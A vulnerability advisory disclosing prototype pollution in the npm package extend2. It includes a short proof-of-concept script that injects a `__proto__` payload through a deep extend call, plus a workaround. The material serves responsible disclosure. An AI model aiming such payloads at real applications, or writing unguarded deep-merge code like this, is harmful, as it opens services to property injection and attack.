Summary

Affected versions of extend2 (npm) are vulnerable to prototype pollution via the exported extend function: when a source object carries an attacker-controlled `__proto__` key, a deep merge writes that key's contents into Object.prototype.

Product

All versions of extend2 (npm).

Impact

If untrusted data (for example a parsed JSON request body) reaches the extend function as a source object, prototype pollution can be achieved: properties added to Object.prototype become visible on every object in the process. The concrete impact depends on the application and on which polluted properties its code or its dependencies read.

Steps to reproduce

const extend = require('extend2');

// A harmless source object; it is only here to show that pollution happens
// even when other sources are merged first.
const a = {'a': 1};

// JSON.parse creates an own property literally named "__proto__", which a
// deep extend (first argument true) then walks into and copies onto
// Object.prototype.
extend(true, {}, a, JSON.parse('{"__proto__":{"polluted":1}}'));

// A fresh, unrelated object now inherits the injected property.
console.log({}.polluted);

Expected result:

1 will be printed to the console, showing that `polluted` was added to Object.prototype and is now inherited by every object, not just the merge target.

Remediation

Currently no fix has been released. As a workaround, avoid passing untrusted inputs to the vulnerable function, or reject (or strip) any object whose key set, at any depth, contains `__proto__`, `constructor` or `prototype` before handing it to extend.

Credit

This issue was discovered and reported by Checkmarx SCA Security Researcher Yaniv Nizry.

Resources

  1. NPM Package